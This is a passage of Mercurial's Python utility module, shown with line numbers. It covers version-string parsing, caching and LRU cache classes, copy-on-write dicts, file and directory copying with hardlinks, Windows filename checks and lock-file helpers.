994 1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 1001 (3, 6, 1, '190-df9b73d2d444+20151118')
996 1002
997 1003 >>> v = b'3.6'
998 1004 >>> versiontuple(v, 2)
999 1005 (3, 6)
1000 1006 >>> versiontuple(v, 3)
1001 1007 (3, 6, None)
1002 1008 >>> versiontuple(v, 4)
1003 1009 (3, 6, None, None)
1004 1010
1005 1011 >>> v = b'3.9-rc'
1006 1012 >>> versiontuple(v, 2)
1007 1013 (3, 9)
1008 1014 >>> versiontuple(v, 3)
1009 1015 (3, 9, None)
1010 1016 >>> versiontuple(v, 4)
1011 1017 (3, 9, None, 'rc')
1012 1018
1013 1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1020 >>> versiontuple(v, 2)
1015 1021 (3, 9)
1016 1022 >>> versiontuple(v, 3)
1017 1023 (3, 9, None)
1018 1024 >>> versiontuple(v, 4)
1019 1025 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1026
1021 1027 >>> versiontuple(b'4.6rc0')
1022 1028 (4, 6, None, 'rc0')
1023 1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1030 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1031 >>> versiontuple(b'.1.2.3')
1026 1032 (None, None, None, '.1.2.3')
1027 1033 >>> versiontuple(b'12.34..5')
1028 1034 (12, 34, None, '..5')
1029 1035 >>> versiontuple(b'1.2.3.4.5.6')
1030 1036 (1, 2, 3, '.4.5.6')
1031 1037 """
1032 1038 if not v:
1033 1039 v = version()
1034 1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1041 if not m:
1036 1042 vparts, extra = '', v
1037 1043 elif m.group(2):
1038 1044 vparts, extra = m.groups()
1039 1045 else:
1040 1046 vparts, extra = m.group(1), None
1041 1047
1042 1048 vints = []
1043 1049 for i in vparts.split('.'):
1044 1050 try:
1045 1051 vints.append(int(i))
1046 1052 except ValueError:
1047 1053 break
1048 1054 # (3, 6) -> (3, 6, None)
1049 1055 while len(vints) < 3:
1050 1056 vints.append(None)
1051 1057
1052 1058 if n == 2:
1053 1059 return (vints[0], vints[1])
1054 1060 if n == 3:
1055 1061 return (vints[0], vints[1], vints[2])
1056 1062 if n == 4:
1057 1063 return (vints[0], vints[1], vints[2], extra)
1058 1064
1059 1065 def cachefunc(func):
1060 1066 '''cache the result of function calls'''
1061 1067 # XXX doesn't handle keywords args
1062 1068 if func.__code__.co_argcount == 0:
1063 1069 cache = []
1064 1070 def f():
1065 1071 if len(cache) == 0:
1066 1072 cache.append(func())
1067 1073 return cache[0]
1068 1074 return f
1069 1075 cache = {}
1070 1076 if func.__code__.co_argcount == 1:
1071 1077 # we gain a small amount of time because
1072 1078 # we don't need to pack/unpack the list
1073 1079 def f(arg):
1074 1080 if arg not in cache:
1075 1081 cache[arg] = func(arg)
1076 1082 return cache[arg]
1077 1083 else:
1078 1084 def f(*args):
1079 1085 if args not in cache:
1080 1086 cache[args] = func(*args)
1081 1087 return cache[args]
1082 1088
1083 1089 return f
1084 1090
1085 1091 class cow(object):
1086 1092 """helper class to make copy-on-write easier
1087 1093
1088 1094 Call preparewrite before doing any writes.
1089 1095 """
1090 1096
1091 1097 def preparewrite(self):
1092 1098 """call this before writes, return self or a copied new object"""
1093 1099 if getattr(self, '_copied', 0):
1094 1100 self._copied -= 1
1095 1101 return self.__class__(self)
1096 1102 return self
1097 1103
1098 1104 def copy(self):
1099 1105 """always do a cheap copy"""
1100 1106 self._copied = getattr(self, '_copied', 0) + 1
1101 1107 return self
1102 1108
1103 1109 class sortdict(collections.OrderedDict):
1104 1110 '''a simple sorted dictionary
1105 1111
1106 1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1113 >>> d2 = d1.copy()
1108 1114 >>> d2
1109 1115 sortdict([('a', 0), ('b', 1)])
1110 1116 >>> d2.update([(b'a', 2)])
1111 1117 >>> list(d2.keys()) # should still be in last-set order
1112 1118 ['b', 'a']
1113 1119 '''
1114 1120
1115 1121 def __setitem__(self, key, value):
1116 1122 if key in self:
1117 1123 del self[key]
1118 1124 super(sortdict, self).__setitem__(key, value)
1119 1125
1120 1126 if pycompat.ispypy:
1121 1127 # __setitem__() isn't called as of PyPy 5.8.0
1122 1128 def update(self, src):
1123 1129 if isinstance(src, dict):
1124 1130 src = src.iteritems()
1125 1131 for k, v in src:
1126 1132 self[k] = v
1127 1133
1128 1134 class cowdict(cow, dict):
1129 1135 """copy-on-write dict
1130 1136
1131 1137 Be sure to call d = d.preparewrite() before writing to d.
1132 1138
1133 1139 >>> a = cowdict()
1134 1140 >>> a is a.preparewrite()
1135 1141 True
1136 1142 >>> b = a.copy()
1137 1143 >>> b is a
1138 1144 True
1139 1145 >>> c = b.copy()
1140 1146 >>> c is a
1141 1147 True
1142 1148 >>> a = a.preparewrite()
1143 1149 >>> b is a
1144 1150 False
1145 1151 >>> a is a.preparewrite()
1146 1152 True
1147 1153 >>> c = c.preparewrite()
1148 1154 >>> b is c
1149 1155 False
1150 1156 >>> b is b.preparewrite()
1151 1157 True
1152 1158 """
1153 1159
1154 1160 class cowsortdict(cow, sortdict):
1155 1161 """copy-on-write sortdict
1156 1162
1157 1163 Be sure to call d = d.preparewrite() before writing to d.
1158 1164 """
1159 1165
1160 1166 class transactional(object):
1161 1167 """Base class for making a transactional type into a context manager."""
1162 1168 __metaclass__ = abc.ABCMeta
1163 1169
1164 1170 @abc.abstractmethod
1165 1171 def close(self):
1166 1172 """Successfully closes the transaction."""
1167 1173
1168 1174 @abc.abstractmethod
1169 1175 def release(self):
1170 1176 """Marks the end of the transaction.
1171 1177
1172 1178 If the transaction has not been closed, it will be aborted.
1173 1179 """
1174 1180
1175 1181 def __enter__(self):
1176 1182 return self
1177 1183
1178 1184 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1185 try:
1180 1186 if exc_type is None:
1181 1187 self.close()
1182 1188 finally:
1183 1189 self.release()
1184 1190
1185 1191 @contextlib.contextmanager
1186 1192 def acceptintervention(tr=None):
1187 1193 """A context manager that closes the transaction on InterventionRequired
1188 1194
1189 1195 If no transaction was provided, this simply runs the body and returns
1190 1196 """
1191 1197 if not tr:
1192 1198 yield
1193 1199 return
1194 1200 try:
1195 1201 yield
1196 1202 tr.close()
1197 1203 except error.InterventionRequired:
1198 1204 tr.close()
1199 1205 raise
1200 1206 finally:
1201 1207 tr.release()
1202 1208
1203 1209 @contextlib.contextmanager
1204 1210 def nullcontextmanager():
1205 1211 yield
1206 1212
1207 1213 class _lrucachenode(object):
1208 1214 """A node in a doubly linked list.
1209 1215
1210 1216 Holds a reference to nodes on either side as well as a key-value
1211 1217 pair for the dictionary entry.
1212 1218 """
1213 1219 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1220
1215 1221 def __init__(self):
1216 1222 self.next = None
1217 1223 self.prev = None
1218 1224
1219 1225 self.key = _notset
1220 1226 self.value = None
1221 1227 self.cost = 0
1222 1228
1223 1229 def markempty(self):
1224 1230 """Mark the node as emptied."""
1225 1231 self.key = _notset
1226 1232 self.value = None
1227 1233 self.cost = 0
1228 1234
1229 1235 class lrucachedict(object):
1230 1236 """Dict that caches most recent accesses and sets.
1231 1237
1232 1238 The dict consists of an actual backing dict - indexed by original
1233 1239 key - and a doubly linked circular list defining the order of entries in
1234 1240 the cache.
1235 1241
1236 1242 The head node is the newest entry in the cache. If the cache is full,
1237 1243 we recycle head.prev and make it the new head. Cache accesses result in
1238 1244 the node being moved to before the existing head and being marked as the
1239 1245 new head node.
1240 1246
1241 1247 Items in the cache can be inserted with an optional "cost" value. This is
1242 1248 simply an integer that is specified by the caller. The cache can be queried
1243 1249 for the total cost of all items presently in the cache.
1244 1250
1245 1251 The cache can also define a maximum cost. If a cache insertion would
1246 1252 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1253 nodes will be evicted to make room for the new code. This can be used
1248 1254 to e.g. set a max memory limit and associate an estimated bytes size
1249 1255 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1256 """
1251 1257 def __init__(self, max, maxcost=0):
1252 1258 self._cache = {}
1253 1259
1254 1260 self._head = head = _lrucachenode()
1255 1261 head.prev = head
1256 1262 head.next = head
1257 1263 self._size = 1
1258 1264 self.capacity = max
1259 1265 self.totalcost = 0
1260 1266 self.maxcost = maxcost
1261 1267
1262 1268 def __len__(self):
1263 1269 return len(self._cache)
1264 1270
1265 1271 def __contains__(self, k):
1266 1272 return k in self._cache
1267 1273
1268 1274 def __iter__(self):
1269 1275 # We don't have to iterate in cache order, but why not.
1270 1276 n = self._head
1271 1277 for i in range(len(self._cache)):
1272 1278 yield n.key
1273 1279 n = n.next
1274 1280
1275 1281 def __getitem__(self, k):
1276 1282 node = self._cache[k]
1277 1283 self._movetohead(node)
1278 1284 return node.value
1279 1285
1280 1286 def insert(self, k, v, cost=0):
1281 1287 """Insert a new item in the cache with optional cost value."""
1282 1288 node = self._cache.get(k)
1283 1289 # Replace existing value and mark as newest.
1284 1290 if node is not None:
1285 1291 self.totalcost -= node.cost
1286 1292 node.value = v
1287 1293 node.cost = cost
1288 1294 self.totalcost += cost
1289 1295 self._movetohead(node)
1290 1296
1291 1297 if self.maxcost:
1292 1298 self._enforcecostlimit()
1293 1299
1294 1300 return
1295 1301
1296 1302 if self._size < self.capacity:
1297 1303 node = self._addcapacity()
1298 1304 else:
1299 1305 # Grab the last/oldest item.
1300 1306 node = self._head.prev
1301 1307
1302 1308 # At capacity. Kill the old entry.
1303 1309 if node.key is not _notset:
1304 1310 self.totalcost -= node.cost
1305 1311 del self._cache[node.key]
1306 1312
1307 1313 node.key = k
1308 1314 node.value = v
1309 1315 node.cost = cost
1310 1316 self.totalcost += cost
1311 1317 self._cache[k] = node
1312 1318 # And mark it as newest entry. No need to adjust order since it
1313 1319 # is already self._head.prev.
1314 1320 self._head = node
1315 1321
1316 1322 if self.maxcost:
1317 1323 self._enforcecostlimit()
1318 1324
1319 1325 def __setitem__(self, k, v):
1320 1326 self.insert(k, v)
1321 1327
1322 1328 def __delitem__(self, k):
1323 1329 self.pop(k)
1324 1330
1325 1331 def pop(self, k, default=_notset):
1326 1332 try:
1327 1333 node = self._cache.pop(k)
1328 1334 except KeyError:
1329 1335 if default is _notset:
1330 1336 raise
1331 1337 return default
1332 1338 value = node.value
1333 1339 self.totalcost -= node.cost
1334 1340 node.markempty()
1335 1341
1336 1342 # Temporarily mark as newest item before re-adjusting head to make
1337 1343 # this node the oldest item.
1338 1344 self._movetohead(node)
1339 1345 self._head = node.next
1340 1346
1341 1347 return value
1342 1348
1343 1349 # Additional dict methods.
1344 1350
1345 1351 def get(self, k, default=None):
1346 1352 try:
1347 1353 return self.__getitem__(k)
1348 1354 except KeyError:
1349 1355 return default
1350 1356
1351 1357 def peek(self, k, default=_notset):
1352 1358 """Get the specified item without moving it to the head
1353 1359
1354 1360 Unlike get(), this doesn't mutate the internal state. But be aware
1355 1361 that it doesn't mean peek() is thread safe.
1356 1362 """
1357 1363 try:
1358 1364 node = self._cache[k]
1359 1365 return node.value
1360 1366 except KeyError:
1361 1367 if default is _notset:
1362 1368 raise
1363 1369 return default
1364 1370
1365 1371 def clear(self):
1366 1372 n = self._head
1367 1373 while n.key is not _notset:
1368 1374 self.totalcost -= n.cost
1369 1375 n.markempty()
1370 1376 n = n.next
1371 1377
1372 1378 self._cache.clear()
1373 1379
1374 1380 def copy(self, capacity=None, maxcost=0):
1375 1381 """Create a new cache as a copy of the current one.
1376 1382
1377 1383 By default, the new cache has the same capacity as the existing one.
1378 1384 But, the cache capacity can be changed as part of performing the
1379 1385 copy.
1380 1386
1381 1387 Items in the copy have an insertion/access order matching this
1382 1388 instance.
1383 1389 """
1384 1390
1385 1391 capacity = capacity or self.capacity
1386 1392 maxcost = maxcost or self.maxcost
1387 1393 result = lrucachedict(capacity, maxcost=maxcost)
1388 1394
1389 1395 # We copy entries by iterating in oldest-to-newest order so the copy
1390 1396 # has the correct ordering.
1391 1397
1392 1398 # Find the first non-empty entry.
1393 1399 n = self._head.prev
1394 1400 while n.key is _notset and n is not self._head:
1395 1401 n = n.prev
1396 1402
1397 1403 # We could potentially skip the first N items when decreasing capacity.
1398 1404 # But let's keep it simple unless it is a performance problem.
1399 1405 for i in range(len(self._cache)):
1400 1406 result.insert(n.key, n.value, cost=n.cost)
1401 1407 n = n.prev
1402 1408
1403 1409 return result
1404 1410
1405 1411 def popoldest(self):
1406 1412 """Remove the oldest item from the cache.
1407 1413
1408 1414 Returns the (key, value) describing the removed cache entry.
1409 1415 """
1410 1416 if not self._cache:
1411 1417 return
1412 1418
1413 1419 # Walk the linked list backwards starting at tail node until we hit
1414 1420 # a non-empty node.
1415 1421 n = self._head.prev
1416 1422 while n.key is _notset:
1417 1423 n = n.prev
1418 1424
1419 1425 key, value = n.key, n.value
1420 1426
1421 1427 # And remove it from the cache and mark it as empty.
1422 1428 del self._cache[n.key]
1423 1429 self.totalcost -= n.cost
1424 1430 n.markempty()
1425 1431
1426 1432 return key, value
1427 1433
1428 1434 def _movetohead(self, node):
1429 1435 """Mark a node as the newest, making it the new head.
1430 1436
1431 1437 When a node is accessed, it becomes the freshest entry in the LRU
1432 1438 list, which is denoted by self._head.
1433 1439
1434 1440 Visually, let's make ``N`` the new head node (* denotes head):
1435 1441
1436 1442 previous/oldest <-> head <-> next/next newest
1437 1443
1438 1444 ----<->--- A* ---<->-----
1439 1445 | |
1440 1446 E <-> D <-> N <-> C <-> B
1441 1447
1442 1448 To:
1443 1449
1444 1450 ----<->--- N* ---<->-----
1445 1451 | |
1446 1452 E <-> D <-> C <-> B <-> A
1447 1453
1448 1454 This requires the following moves:
1449 1455
1450 1456 C.next = D (node.prev.next = node.next)
1451 1457 D.prev = C (node.next.prev = node.prev)
1452 1458 E.next = N (head.prev.next = node)
1453 1459 N.prev = E (node.prev = head.prev)
1454 1460 N.next = A (node.next = head)
1455 1461 A.prev = N (head.prev = node)
1456 1462 """
1457 1463 head = self._head
1458 1464 # C.next = D
1459 1465 node.prev.next = node.next
1460 1466 # D.prev = C
1461 1467 node.next.prev = node.prev
1462 1468 # N.prev = E
1463 1469 node.prev = head.prev
1464 1470 # N.next = A
1465 1471 # It is tempting to do just "head" here, however if node is
1466 1472 # adjacent to head, this will do bad things.
1467 1473 node.next = head.prev.next
1468 1474 # E.next = N
1469 1475 node.next.prev = node
1470 1476 # A.prev = N
1471 1477 node.prev.next = node
1472 1478
1473 1479 self._head = node
1474 1480
1475 1481 def _addcapacity(self):
1476 1482 """Add a node to the circular linked list.
1477 1483
1478 1484 The new node is inserted before the head node.
1479 1485 """
1480 1486 head = self._head
1481 1487 node = _lrucachenode()
1482 1488 head.prev.next = node
1483 1489 node.prev = head.prev
1484 1490 node.next = head
1485 1491 head.prev = node
1486 1492 self._size += 1
1487 1493 return node
1488 1494
1489 1495 def _enforcecostlimit(self):
1490 1496 # This should run after an insertion. It should only be called if total
1491 1497 # cost limits are being enforced.
1492 1498 # The most recently inserted node is never evicted.
1493 1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1494 1500 return
1495 1501
1496 1502 # This is logically equivalent to calling popoldest() until we
1497 1503 # free up enough cost. We don't do that since popoldest() needs
1498 1504 # to walk the linked list and doing this in a loop would be
1499 1505 # quadratic. So we find the first non-empty node and then
1500 1506 # walk nodes until we free up enough capacity.
1501 1507 #
1502 1508 # If we only removed the minimum number of nodes to free enough
1503 1509 # cost at insert time, chances are high that the next insert would
1504 1510 # also require pruning. This would effectively constitute quadratic
1505 1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1506 1512 # target cost that is a percentage of the max cost. This will tend
1507 1513 # to free more nodes when the high water mark is reached, which
1508 1514 # lowers the chances of needing to prune on the subsequent insert.
1509 1515 targetcost = int(self.maxcost * 0.75)
1510 1516
1511 1517 n = self._head.prev
1512 1518 while n.key is _notset:
1513 1519 n = n.prev
1514 1520
1515 1521 while len(self) > 1 and self.totalcost > targetcost:
1516 1522 del self._cache[n.key]
1517 1523 self.totalcost -= n.cost
1518 1524 n.markempty()
1519 1525 n = n.prev
1520 1526
1521 1527 def lrucachefunc(func):
1522 1528 '''cache most recent results of function calls'''
1523 1529 cache = {}
1524 1530 order = collections.deque()
1525 1531 if func.__code__.co_argcount == 1:
1526 1532 def f(arg):
1527 1533 if arg not in cache:
1528 1534 if len(cache) > 20:
1529 1535 del cache[order.popleft()]
1530 1536 cache[arg] = func(arg)
1531 1537 else:
1532 1538 order.remove(arg)
1533 1539 order.append(arg)
1534 1540 return cache[arg]
1535 1541 else:
1536 1542 def f(*args):
1537 1543 if args not in cache:
1538 1544 if len(cache) > 20:
1539 1545 del cache[order.popleft()]
1540 1546 cache[args] = func(*args)
1541 1547 else:
1542 1548 order.remove(args)
1543 1549 order.append(args)
1544 1550 return cache[args]
1545 1551
1546 1552 return f
1547 1553
1548 1554 class propertycache(object):
1549 1555 def __init__(self, func):
1550 1556 self.func = func
1551 1557 self.name = func.__name__
1552 1558 def __get__(self, obj, type=None):
1553 1559 result = self.func(obj)
1554 1560 self.cachevalue(obj, result)
1555 1561 return result
1556 1562
1557 1563 def cachevalue(self, obj, value):
1558 1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1559 1565 obj.__dict__[self.name] = value
1560 1566
1561 1567 def clearcachedproperty(obj, prop):
1562 1568 '''clear a cached property value, if one has been set'''
1563 1569 prop = pycompat.sysstr(prop)
1564 1570 if prop in obj.__dict__:
1565 1571 del obj.__dict__[prop]
1566 1572
1567 1573 def increasingchunks(source, min=1024, max=65536):
1568 1574 '''return no less than min bytes per chunk while data remains,
1569 1575 doubling min after each chunk until it reaches max'''
1570 1576 def log2(x):
1571 1577 if not x:
1572 1578 return 0
1573 1579 i = 0
1574 1580 while x:
1575 1581 x >>= 1
1576 1582 i += 1
1577 1583 return i - 1
1578 1584
1579 1585 buf = []
1580 1586 blen = 0
1581 1587 for chunk in source:
1582 1588 buf.append(chunk)
1583 1589 blen += len(chunk)
1584 1590 if blen >= min:
1585 1591 if min < max:
1586 1592 min = min << 1
1587 1593 nmin = 1 << log2(blen)
1588 1594 if nmin > min:
1589 1595 min = nmin
1590 1596 if min > max:
1591 1597 min = max
1592 1598 yield ''.join(buf)
1593 1599 blen = 0
1594 1600 buf = []
1595 1601 if buf:
1596 1602 yield ''.join(buf)
1597 1603
1598 1604 def always(fn):
1599 1605 return True
1600 1606
1601 1607 def never(fn):
1602 1608 return False
1603 1609
1604 1610 def nogc(func):
1605 1611 """disable garbage collector
1606 1612
1607 1613 Python's garbage collector triggers a GC each time a certain number of
1608 1614 container objects (the number being defined by gc.get_threshold()) are
1609 1615 allocated even when marked not to be tracked by the collector. Tracking has
1610 1616 no effect on when GCs are triggered, only on what objects the GC looks
1611 1617 into. As a workaround, disable GC while building complex (huge)
1612 1618 containers.
1613 1619
1614 1620 This garbage collector issue have been fixed in 2.7. But it still affect
1615 1621 CPython's performance.
1616 1622 """
1617 1623 def wrapper(*args, **kwargs):
1618 1624 gcenabled = gc.isenabled()
1619 1625 gc.disable()
1620 1626 try:
1621 1627 return func(*args, **kwargs)
1622 1628 finally:
1623 1629 if gcenabled:
1624 1630 gc.enable()
1625 1631 return wrapper
1626 1632
1627 1633 if pycompat.ispypy:
1628 1634 # PyPy runs slower with gc disabled
1629 1635 nogc = lambda x: x
1630 1636
1631 1637 def pathto(root, n1, n2):
1632 1638 '''return the relative path from one place to another.
1633 1639 root should use os.sep to separate directories
1634 1640 n1 should use os.sep to separate directories
1635 1641 n2 should use "/" to separate directories
1636 1642 returns an os.sep-separated path.
1637 1643
1638 1644 If n1 is a relative path, it's assumed it's
1639 1645 relative to root.
1640 1646 n2 should always be relative to root.
1641 1647 '''
1642 1648 if not n1:
1643 1649 return localpath(n2)
1644 1650 if os.path.isabs(n1):
1645 1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1646 1652 return os.path.join(root, localpath(n2))
1647 1653 n2 = '/'.join((pconvert(root), n2))
1648 1654 a, b = splitpath(n1), n2.split('/')
1649 1655 a.reverse()
1650 1656 b.reverse()
1651 1657 while a and b and a[-1] == b[-1]:
1652 1658 a.pop()
1653 1659 b.pop()
1654 1660 b.reverse()
1655 1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1656 1662
1657 1663 # the location of data files matching the source code
1658 1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1659 1665 # executable version (py2exe) doesn't support __file__
1660 1666 datapath = os.path.dirname(pycompat.sysexecutable)
1661 1667 else:
1662 1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1663 1669
1664 1670 i18n.setdatapath(datapath)
1665 1671
1666 1672 def checksignature(func):
1667 1673 '''wrap a function with code to check for calling errors'''
1668 1674 def check(*args, **kwargs):
1669 1675 try:
1670 1676 return func(*args, **kwargs)
1671 1677 except TypeError:
1672 1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1673 1679 raise error.SignatureError
1674 1680 raise
1675 1681
1676 1682 return check
1677 1683
1678 1684 # a whilelist of known filesystems where hardlink works reliably
1679 1685 _hardlinkfswhitelist = {
1680 1686 'apfs',
1681 1687 'btrfs',
1682 1688 'ext2',
1683 1689 'ext3',
1684 1690 'ext4',
1685 1691 'hfs',
1686 1692 'jfs',
1687 1693 'NTFS',
1688 1694 'reiserfs',
1689 1695 'tmpfs',
1690 1696 'ufs',
1691 1697 'xfs',
1692 1698 'zfs',
1693 1699 }
1694 1700
1695 1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1696 1702 '''copy a file, preserving mode and optionally other stat info like
1697 1703 atime/mtime
1698 1704
1699 1705 checkambig argument is used with filestat, and is useful only if
1700 1706 destination file is guarded by any lock (e.g. repo.lock or
1701 1707 repo.wlock).
1702 1708
1703 1709 copystat and checkambig should be exclusive.
1704 1710 '''
1705 1711 assert not (copystat and checkambig)
1706 1712 oldstat = None
1707 1713 if os.path.lexists(dest):
1708 1714 if checkambig:
1709 1715 oldstat = checkambig and filestat.frompath(dest)
1710 1716 unlink(dest)
1711 1717 if hardlink:
1712 1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1713 1719 # unless we are confident that dest is on a whitelisted filesystem.
1714 1720 try:
1715 1721 fstype = getfstype(os.path.dirname(dest))
1716 1722 except OSError:
1717 1723 fstype = None
1718 1724 if fstype not in _hardlinkfswhitelist:
1719 1725 hardlink = False
1720 1726 if hardlink:
1721 1727 try:
1722 1728 oslink(src, dest)
1723 1729 return
1724 1730 except (IOError, OSError):
1725 1731 pass # fall back to normal copy
1726 1732 if os.path.islink(src):
1727 1733 os.symlink(os.readlink(src), dest)
1728 1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1729 1735 # for them anyway
1730 1736 else:
1731 1737 try:
1732 1738 shutil.copyfile(src, dest)
1733 1739 if copystat:
1734 1740 # copystat also copies mode
1735 1741 shutil.copystat(src, dest)
1736 1742 else:
1737 1743 shutil.copymode(src, dest)
1738 1744 if oldstat and oldstat.stat:
1739 1745 newstat = filestat.frompath(dest)
1740 1746 if newstat.isambig(oldstat):
1741 1747 # stat of copied file is ambiguous to original one
1742 1748 advanced = (
1743 1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1744 1750 os.utime(dest, (advanced, advanced))
1745 1751 except shutil.Error as inst:
1746 1752 raise error.Abort(str(inst))
1747 1753
1748 1754 def copyfiles(src, dst, hardlink=None, progress=None):
1749 1755 """Copy a directory tree using hardlinks if possible."""
1750 1756 num = 0
1751 1757
1752 1758 def settopic():
1753 1759 if progress:
1754 1760 progress.topic = _('linking') if hardlink else _('copying')
1755 1761
1756 1762 if os.path.isdir(src):
1757 1763 if hardlink is None:
1758 1764 hardlink = (os.stat(src).st_dev ==
1759 1765 os.stat(os.path.dirname(dst)).st_dev)
1760 1766 settopic()
1761 1767 os.mkdir(dst)
1762 1768 for name, kind in listdir(src):
1763 1769 srcname = os.path.join(src, name)
1764 1770 dstname = os.path.join(dst, name)
1765 1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1766 1772 num += n
1767 1773 else:
1768 1774 if hardlink is None:
1769 1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1770 1776 os.stat(os.path.dirname(dst)).st_dev)
1771 1777 settopic()
1772 1778
1773 1779 if hardlink:
1774 1780 try:
1775 1781 oslink(src, dst)
1776 1782 except (IOError, OSError):
1777 1783 hardlink = False
1778 1784 shutil.copy(src, dst)
1779 1785 else:
1780 1786 shutil.copy(src, dst)
1781 1787 num += 1
1782 1788 if progress:
1783 1789 progress.increment()
1784 1790
1785 1791 return hardlink, num
1786 1792
1787 1793 _winreservednames = {
1788 1794 'con', 'prn', 'aux', 'nul',
1789 1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1790 1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1791 1797 }
1792 1798 _winreservedchars = ':*?"<>|'
1793 1799 def checkwinfilename(path):
1794 1800 r'''Check that the base-relative path is a valid filename on Windows.
1795 1801 Returns None if the path is ok, or a UI string describing the problem.
1796 1802
1797 1803 >>> checkwinfilename(b"just/a/normal/path")
1798 1804 >>> checkwinfilename(b"foo/bar/con.xml")
1799 1805 "filename contains 'con', which is reserved on Windows"
1800 1806 >>> checkwinfilename(b"foo/con.xml/bar")
1801 1807 "filename contains 'con', which is reserved on Windows"
1802 1808 >>> checkwinfilename(b"foo/bar/xml.con")
1803 1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1804 1810 "filename contains 'AUX', which is reserved on Windows"
1805 1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1806 1812 "filename contains ':', which is reserved on Windows"
1807 1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1808 1814 "filename contains '\\x07', which is invalid on Windows"
1809 1815 >>> checkwinfilename(b"foo/bar/bla ")
1810 1816 "filename ends with ' ', which is not allowed on Windows"
1811 1817 >>> checkwinfilename(b"../bar")
1812 1818 >>> checkwinfilename(b"foo\\")
1813 1819 "filename ends with '\\', which is invalid on Windows"
1814 1820 >>> checkwinfilename(b"foo\\/bar")
1815 1821 "directory name ends with '\\', which is invalid on Windows"
1816 1822 '''
1817 1823 if path.endswith('\\'):
1818 1824 return _("filename ends with '\\', which is invalid on Windows")
1819 1825 if '\\/' in path:
1820 1826 return _("directory name ends with '\\', which is invalid on Windows")
1821 1827 for n in path.replace('\\', '/').split('/'):
1822 1828 if not n:
1823 1829 continue
1824 1830 for c in _filenamebytestr(n):
1825 1831 if c in _winreservedchars:
1826 1832 return _("filename contains '%s', which is reserved "
1827 1833 "on Windows") % c
1828 1834 if ord(c) <= 31:
1829 1835 return _("filename contains '%s', which is invalid "
1830 1836 "on Windows") % stringutil.escapestr(c)
1831 1837 base = n.split('.')[0]
1832 1838 if base and base.lower() in _winreservednames:
1833 1839 return _("filename contains '%s', which is reserved "
1834 1840 "on Windows") % base
1835 1841 t = n[-1:]
1836 1842 if t in '. ' and n not in '..':
1837 1843 return _("filename ends with '%s', which is not allowed "
1838 1844 "on Windows") % t
1839 1845
1840 1846 if pycompat.iswindows:
1841 1847 checkosfilename = checkwinfilename
1842 1848 timer = time.clock
1843 1849 else:
1844 1850 checkosfilename = platform.checkosfilename
1845 1851 timer = time.time
1846 1852
1847 1853 if safehasattr(time, "perf_counter"):
1848 1854 timer = time.perf_counter
1849 1855
1850 1856 def makelock(info, pathname):
1851 1857 """Create a lock file atomically if possible
1852 1858
1853 1859 This may leave a stale lock file if symlink isn't supported and signal
1854 1860 interrupt is enabled.
1855 1861 """
1856 1862 try:
1857 1863 return os.symlink(info, pathname)
1858 1864 except OSError as why:
1859 1865 if why.errno == errno.EEXIST:
1860 1866 raise
1861 1867 except AttributeError: # no symlink in os
1862 1868 pass
1863 1869
1864 1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1865 1871 ld = os.open(pathname, flags)
1866 1872 os.write(ld, info)
1867 1873 os.close(ld)
1868 1874
1869 1875 def readlock(pathname):
1870 1876 try:
1871 1877 return readlink(pathname)
1872 1878 except OSError as why:
1873 1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1874 1880 raise
1875 1881 except AttributeError: # no symlink in os
1876 1882 pass
1877 1883 with posixfile(pathname, 'rb') as fp:
1878 1884 return fp.read()
1879 1885
1880 1886 def fstat(fp):
1881 1887 '''stat file object that may not have fileno method.'''
1882 1888 try:
1883 1889 return os.fstat(fp.fileno())
1884 1890 except AttributeError:
1885 1891 return os.stat(fp.name)
1886 1892
1887 1893 # File system features
1888 1894
1889 1895 def fscasesensitive(path):
1890 1896 """
1891 1897 Return true if the given path is on a case-sensitive filesystem
1892 1898
1893 1899 Requires a path (like /foo/.hg) ending with a foldable final
1894 1900 directory component.
1895 1901 """
1896 1902 s1 = os.lstat(path)
1897 1903 d, b = os.path.split(path)
1898 1904 b2 = b.upper()
1899 1905 if b == b2:
1900 1906 b2 = b.lower()
1901 1907 if b == b2:
1902 1908 return True # no evidence against case sensitivity
1903 1909 p2 = os.path.join(d, b2)
1904 1910 try:
1905 1911 s2 = os.lstat(p2)
1906 1912 if s2 == s1:
1907 1913 return False
1908 1914 return True
1909 1915 except OSError:
1910 1916 return True
1911 1917
1912 1918 try:
1913 1919 import re2
1914 1920 _re2 = None
1915 1921 except ImportError:
1916 1922 _re2 = False
1917 1923
1918 1924 class _re(object):
1919 1925 def _checkre2(self):
1920 1926 global _re2
1921 1927 try:
1922 1928 # check if match works, see issue3964
